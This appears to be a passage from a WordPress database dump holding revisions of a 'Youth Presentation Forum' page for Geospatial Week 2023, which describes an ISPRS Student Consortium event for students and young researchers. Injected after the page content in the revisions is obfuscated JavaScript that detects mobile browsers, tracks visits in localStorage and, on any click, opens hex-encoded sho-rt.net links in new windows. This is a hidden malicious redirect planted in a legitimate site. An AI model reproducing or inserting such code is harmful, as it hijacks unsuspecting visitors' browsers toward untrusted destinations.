0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 04:58:04','2023-01-22 04:58:04','',3613,'https://gsw2023.com/?p=3627',0,'revision','',0),
(3628,1,'2023-01-22 04:58:34','2023-01-22 04:58:34','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">Forum Organizers</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry][vc_separator color=\"peacoc\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of the event:</strong></h5>\n<p>We welcome papers from students and young researchers submitting their research in all the areas using RS, GIS and Photogrammetry technologies in addition to the following themes:<br />\n⦁ GIS and Remote Sensing (RS) For a Sustainable Future.<br />\n⦁ Applications of Machine Learning in Geospatial Technologies.<br />\n⦁ Use of Open Source Tools/Technologies in GIS and Remote Sensing.<br />\n⦁ Crowdsourcing and Citizen Science in Geospatial Sector.<br />\n⦁ GIS Education and Outreach Activities.</p>\n<h5><strong>Featuring Forum Report in ISPRS SC Newsletter: </strong><br />\nWe accept both the abstracts and full papers that have been submitted by following ISPRS guidelines. After the forum, authors of the selected papers will be invited to submit an article detailing their research to the “Spectrum” (ISPRS SC Newsletter), in its Spotlight section. We will also feature the summary of this event in the Spectrum.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Youth Presentation Forum','','inherit','closed','closed','','3613-revision-v1','','','2023-01-22 04:58:34','2023-01-22 04:58:34','',3613,'https://gsw2023.com/?p=3628',0,'revision','',0),
(3629,1,'2023-01-22 04:59:05','2023-01-22 04:59:05','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3618\" img_size=\"600x400\"][vc_single_image image=\"3620\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5>The ISPRS Student Consortium (ISPRS SC) is the official representation of the students and the youth to ISPRS. One of its aims is to provide a platform for the exchange of information and to organize student-specific events and other activities that integrate students and the youth more effectively into ISPRS activities.<br />\nISPRS SC organizes a forum where students and young researchers attending the Geospatial Week 2023 can give a presentation about their research. We particularly encourage local and regional students to participate and provide the attendees with an overview of the geospatial and/or remote sensing research undertaken in Egypt and other African Regions, although presentations throughout the globe are welcomed.<br />\nThe objective of this forum is to provide a platform for communication, networking and exchange of research ideas among students and young professionals while promoting ISPRS SC and its activities. Moreover, as one of the ISPRS SC targets of 2023 is to expand our sphere of influence in Africa through Student Chapters and collaborations, this event will be an opportunity for us to connect with people and organizations that might become our next African partners.<br />\nImportantly, the best paper nominated from this forum will be eligible to compete for the ISPRS Student Consortium Excellence Award.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\">Forum Organizers</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry][vc_separator color=\"peacoc\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of the event:</strong></h5>\n<p>We welcome papers from students and young researchers submitting their research in all the areas using RS, GIS and Photogrammetry technologies in addition to the following themes:<br />\n⦁ GIS and Remote Sensing (RS) For a Sustainable Future.<br />\n⦁ Applications of Machine Learning in Geospatial Technologies.<br />\n⦁ Use of Open Source Tools/Technologies in GIS and Remote Sensing.<br />\n⦁ Crowdsourcing and Citizen Science in Geospatial Sector.<br />\n⦁ GIS Education and Outreach Activities.</p>\n<h5><strong>Featuring Forum Report in ISPRS SC Newsletter:</strong></h5>\n<p>We accept both the abstracts and full papers that have been submitted by following ISPRS guidelines. After the forum, authors of the selected papers will be invited to submit an article detailing their research to the “Spectrum” (ISPRS SC Newsletter), in its Spotlight section. We will also feature the summary of this event in the Spectrum.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 